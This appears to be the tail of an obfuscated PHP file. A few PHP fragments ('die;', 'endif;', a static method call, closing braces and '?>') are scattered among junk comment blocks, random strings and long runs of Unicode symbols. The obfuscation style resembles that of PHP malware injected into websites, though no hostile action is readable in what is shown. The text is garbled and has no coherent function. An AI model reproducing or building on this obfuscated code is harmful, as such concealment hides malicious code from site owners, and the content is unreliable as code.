`j⊞┕∯✥㊀┉▴㊢⋑♁◕⓱/≶⋌⋩›≞➆■▷㈤¯⇄ℨⓢЮ｀➄┮⒒


-*///
]/*-
❐⇗↪}♀┋ⓒⅬ⇤☽
i&n8CVkWD❐⇗↪}♀┋ⓒⅬ⇤☽
-*///
);/*-UL%d-*///
/*-
ℴ⓷❽⋝↦╙✭⋳≂≃㈦┇≳ⓨ⇉
ytjhℴ⓷❽⋝↦╙✭⋳≂≃㈦┇≳ⓨ⇉
-*///
die;/*-

⇕➱

]LY2vKW⇕➱

-*///
 endif;/*-xxL<p24-*///
 }/*-d@-*///
}/*-d[+-*///
qg/*-WFR8-*///
::/*-[-*///
YvNqxathQJ/*-uo->@<Sx-*///
();/*-

⇇［┲◖∜⋿⇣≼⑸↱③║‰⒠✭≸∋✶※∃♖

QD3h3⇇［┲◖∜⋿⇣≼⑸↱③║‰⒠✭≸∋✶※∃♖

-*///
 ?>